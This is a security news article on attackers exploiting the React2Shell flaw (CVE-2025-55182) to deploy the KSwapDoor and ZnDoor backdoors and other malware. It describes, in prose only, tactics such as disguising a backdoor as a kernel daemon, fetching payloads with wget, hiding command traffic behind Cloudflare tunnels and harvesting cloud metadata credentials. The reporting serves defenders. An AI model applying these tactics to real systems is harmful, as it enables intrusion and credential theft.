Cybersecurity researchers have confirmed active exploitation of a critical security flaw known as React2Shell, with threat actors using it to deploy multiple Linux based backdoors, including KSwapDoor and ZnDoor. The findings come from independent investigations conducted by Palo Alto Networks Unit 42 and NTT Security.
According to Unit 42, KSwapDoor is a highly sophisticated remote access tool engineered for stealth focused intrusions. The malware is designed to resemble a legitimate Linux kernel swap daemon, allowing it to blend into normal system activity and evade detection.
Justin Moore, Senior Manager of Threat Intelligence Research at Unit 42, explained that KSwapDoor creates an internal mesh network that allows compromised servers to communicate with each other. This design helps the malware bypass security controls, while encrypted communications conceal attacker activity. The backdoor also includes a sleeper mode, enabling attackers to reactivate it using a covert trigger that can pass through firewalls unnoticed.
Researchers clarified that the malware was previously misidentified as BPFDoor. Further analysis revealed that it provides interactive shell access, command execution, file manipulation, and lateral movement scanning, making it a full featured Linux backdoor.
ZnDoor Attacks Target Organizations in Japan
In a parallel disclosure, NTT Security reported that organizations in Japan are being targeted through React2Shell exploitation to deploy ZnDoor, a remote access trojan observed in the wild since December 2023. These attacks typically involve executing a bash command that retrieves the payload from a remote server using wget before running it on the compromised system.
Once active, ZnDoor connects back to attacker controlled infrastructure to receive commands. Its capabilities include executing shell commands, launching interactive shells, browsing and manipulating files, modifying timestamps, enabling SOCKS5 proxy services, and setting up port forwarding. These features allow attackers to maintain persistent and flexible control over infected systems.
Multiple Threat Groups Weaponizing the Flaw
The vulnerability, tracked as CVE-2025-55182 with a maximum CVSS score of 10.0, has been exploited by several threat actors. Google has identified at least five China linked groups abusing the flaw to distribute a range of malicious payloads, including tunneling tools, downloaders, and custom backdoors written in Go.
Microsoft also confirmed active exploitation in its advisory, noting that attackers have used the flaw to execute arbitrary commands after compromise. Observed activity includes establishing reverse shells connected to known Cobalt Strike servers, deploying remote monitoring and management tools such as MeshAgent, modifying SSH authorized keys, and enabling root level access.
Some campaigns have delivered malware families such as VShell, EtherRAT, ShadowPad, SNOWLIGHT, and XMRig. Attackers have also relied on Cloudflare Tunnel endpoints ending in trycloudflare.com to mask command and control traffic and evade network defenses.
Cloud and Credential Theft Activity Observed
Microsoft further revealed that attackers leveraged compromised systems to harvest cloud credentials by querying instance metadata services across major cloud platforms, including Azure, Amazon Web Services, Google Cloud Platform, and Tencent Cloud. The goal was to obtain identity tokens that could be reused to move deeper into cloud environments.
Additional tooling observed during these intrusions included secret discovery utilities such as TruffleHog and Gitleaks, along with custom scripts to extract sensitive information. Attempts to steal AI related credentials, including OpenAI API keys, Databricks tokens, and Kubernetes service account secrets, were also documented.
Large Scale Campaigns and Global Exposure
In a separate investigation, Italian security firm Beelzebub detailed a campaign dubbed Operation PCPcat, where attackers exploited flaws in Next.js to systematically extract sensitive data, establish persistence, deploy SOCKS5 proxies, and scan the internet for additional vulnerable hosts. The operation is estimated to have compromised more than 59,000 servers worldwide.
Internet wide monitoring shows the scale of the exposure remains significant. The Shadowserver Foundation is currently tracking over 111,000 IP addresses that remain vulnerable to React2Shell attacks. Meanwhile, telemetry from GreyNoise indicates hundreds of malicious IP addresses actively participating in exploitation attempts across multiple countries within the past 24 hours.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
